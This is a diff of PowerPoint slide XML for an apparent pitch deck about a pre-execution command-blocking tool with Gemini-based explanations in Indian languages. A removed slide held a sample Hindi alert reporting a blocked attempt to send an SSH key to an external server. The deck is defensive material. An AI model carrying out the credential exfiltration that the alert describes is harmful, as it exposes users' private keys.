@@ -6763,15 +6360,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>2</a:t>
+              <a:defRPr sz="1200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>LLM</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6784,8 +6381,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1005840" y="1920240"/>
-            <a:ext cx="3200400" cy="274320"/>
+            <a:off x="2377440" y="1938528"/>
+            <a:ext cx="5943600" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6799,15 +6396,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1400" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Research Novelty</a:t>
+              <a:defRPr sz="1200" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Google Gemini 2.5-flash (free tier, 1500 req/day)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6820,8 +6417,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1005840" y="2194560"/>
-            <a:ext cx="7498079" cy="274320"/>
+            <a:off x="731520" y="2322576"/>
+            <a:ext cx="1645920" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6835,15 +6432,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1100" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>4-component divergence scoring with renormalization — novel.</a:t>
+              <a:defRPr sz="1200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Datastore</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6856,8 +6453,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="2743200"/>
-            <a:ext cx="365760" cy="274320"/>
+            <a:off x="2377440" y="2322576"/>
+            <a:ext cx="5943600" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6871,15 +6468,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>3</a:t>
+              <a:defRPr sz="1200" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>MongoDB (Atlas M0 free / local)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6892,8 +6489,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1005840" y="2743200"/>
-            <a:ext cx="3200400" cy="274320"/>
+            <a:off x="731520" y="2706624"/>
+            <a:ext cx="1645920" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6907,7 +6504,7 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1400" b="1">
+              <a:defRPr sz="1200" b="1">
                 <a:solidFill>
                   <a:srgbClr val="F8F8F8"/>
                 </a:solidFill>
@@ -6915,7 +6512,7 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>Production-Ready</a:t>
+              <a:t>Transport</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6928,8 +6525,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1005840" y="3017520"/>
-            <a:ext cx="7498079" cy="274320"/>
+            <a:off x="2377440" y="2706624"/>
+            <a:ext cx="5943600" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6943,7 +6540,7 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1100" b="0">
+              <a:defRPr sz="1200" b="0">
                 <a:solidFill>
                   <a:srgbClr val="B0B0C0"/>
                 </a:solidFill>
@@ -6951,7 +6548,7 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>Working pre-exec blocking. Not a paper prototype.</a:t>
+              <a:t>Unix Domain Socket (UDS)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6964,8 +6561,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="3566160"/>
-            <a:ext cx="365760" cy="274320"/>
+            <a:off x="731520" y="3090672"/>
+            <a:ext cx="1645920" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6979,15 +6576,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>4</a:t>
+              <a:defRPr sz="1200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Testing</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7000,8 +6597,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1005840" y="3566160"/>
-            <a:ext cx="3200400" cy="274320"/>
+            <a:off x="2377440" y="3090672"/>
+            <a:ext cx="5943600" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7015,15 +6612,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1400" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Indian Languages</a:t>
+              <a:defRPr sz="1200" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>jqwik (property-based), JUnit 5</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7036,8 +6633,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1005840" y="3840480"/>
-            <a:ext cx="7498079" cy="274320"/>
+            <a:off x="731520" y="3474720"/>
+            <a:ext cx="1645920" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7051,7 +6648,43 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1100" b="0">
+              <a:defRPr sz="1200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Languages</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="16" name="TextBox 15"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2377440" y="3474720"/>
+            <a:ext cx="5943600" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1200" b="0">
                 <a:solidFill>
                   <a:srgbClr val="B0B0C0"/>
                 </a:solidFill>
@@ -7059,7 +6692,79 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>11 languages + Bhashini govt fallback. No tool does this.</a:t>
+              <a:t>11 Indian languages (Gemini + Bhashini)</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="TextBox 16"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="731520" y="3858768"/>
+            <a:ext cx="1645920" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Speech</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="18" name="TextBox 17"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2377440" y="3858768"/>
+            <a:ext cx="5943600" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1200" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Gemini multimodal API (STT)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7106,7 +6811,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="548640" y="274320"/>
-            <a:ext cx="7772400" cy="640080"/>
+            <a:ext cx="7772400" cy="492443"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7128,8 +6833,14 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>11 BHARAT LANGUAGES</a:t>
-            </a:r>
+              <a:rPr dirty="0"/>
+              <a:t>WHY THIS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> MATTERS</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7185,8 +6896,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="1051560"/>
-            <a:ext cx="8046720" cy="548640"/>
+            <a:off x="548640" y="1097280"/>
+            <a:ext cx="365760" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7199,20 +6910,16 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="ctr">
-              <a:defRPr sz="1200" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Hindi (हिन्दी) • Bengali (বাংলা) • Telugu (తెలుగు) • Marathi (मराठी) • Tamil (தமிழ்)</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:t>Gujarati (ગુજરાતી) • Kannada (ಕನ್ನಡ) • Malayalam (മലയാളം) • Punjabi (ਪੰਜਾਬੀ) • Odia (ଓଡ଼ିଆ) • English</a:t>
+            <a:pPr algn="l">
+              <a:defRPr sz="2000" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>1</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7225,8 +6932,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="1828800"/>
-            <a:ext cx="8046720" cy="1097280"/>
+            <a:off x="1005840" y="1097280"/>
+            <a:ext cx="3200400" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7239,141 +6946,376 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1200">
+            <a:pPr algn="l">
+              <a:defRPr sz="1400" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Sovereign AI</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1005840" y="1371600"/>
+            <a:ext cx="7498079" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1100" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Zero data exfiltration. All inference local. India data sovereignty.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="TextBox 6"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="1920240"/>
+            <a:ext cx="365760" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="2000" b="1">
                 <a:solidFill>
                   <a:srgbClr val="00D4AA"/>
                 </a:solidFill>
                 <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1200">
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>2</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1005840" y="1920240"/>
+            <a:ext cx="3200400" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1400" b="1">
                 <a:solidFill>
                   <a:srgbClr val="F8F8F8"/>
                 </a:solidFill>
                 <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>Real-time explanation translation — every BLOCK/ASK in operator language</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1200">
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Research Novelty</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="TextBox 8"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1005840" y="2194560"/>
+            <a:ext cx="7498079" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1100" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>4-component divergence scoring with renormalization — novel.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="TextBox 9"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="2743200"/>
+            <a:ext cx="365760" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="2000" b="1">
                 <a:solidFill>
                   <a:srgbClr val="00D4AA"/>
                 </a:solidFill>
                 <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1200">
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>3</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="TextBox 10"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1005840" y="2743200"/>
+            <a:ext cx="3200400" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1400" b="1">
                 <a:solidFill>
                   <a:srgbClr val="F8F8F8"/>
                 </a:solidFill>
                 <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>Speech-to-text command input — voice via Gemini multimodal API</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1200">
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Production-Ready</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="TextBox 11"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1005840" y="3017520"/>
+            <a:ext cx="7498079" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1100" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Working pre-exec blocking. Not a paper prototype.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="TextBox 12"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="3566160"/>
+            <a:ext cx="365760" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="2000" b="1">
                 <a:solidFill>
                   <a:srgbClr val="00D4AA"/>
                 </a:solidFill>
                 <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1200">
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>4</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="TextBox 13"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1005840" y="3566160"/>
+            <a:ext cx="3200400" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1400" b="1">
                 <a:solidFill>
                   <a:srgbClr val="F8F8F8"/>
                 </a:solidFill>
                 <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>Bhashini government-stack fallback — if Gemini unavailable</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="Rounded Rectangle 5"/>
-          <p:cNvSpPr/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Indian Languages</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="TextBox 14"/>
+          <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="3291840"/>
-            <a:ext cx="8046720" cy="914400"/>
-          </a:xfrm>
-          <a:prstGeom prst="roundRect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="2A1A1A"/>
-          </a:solidFill>
-          <a:ln w="12700">
-            <a:solidFill>
-              <a:srgbClr val="FF4444"/>
-            </a:solidFill>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="127000" tIns="76200" rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:r>
-              <a:rPr sz="1200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>🛑 अवरुद्ध: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100">
+            <a:off x="1005840" y="3840480"/>
+            <a:ext cx="7498079" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1100" b="0">
                 <a:solidFill>
                   <a:srgbClr val="B0B0C0"/>
                 </a:solidFill>
                 <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>यह आदेश आपके घोषित उद्देश्य से काफ़़ी विचलित है। SSH कुंजी को बाहरी सर्वर पर भेजने का प्रयास।</a:t>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>11 languages + Bhashini govt fallback. No tool does this.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7413,6 +7355,225 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
+          <p:cNvPr id="12" name="Rectangle 11">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr bwMode="white">
+          <a:xfrm>
+            <a:off x="1143" y="0"/>
+            <a:ext cx="9141714" cy="5143500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle>
+            <a:defPPr>
+              <a:defRPr lang="en-US"/>
+            </a:defPPr>
+            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
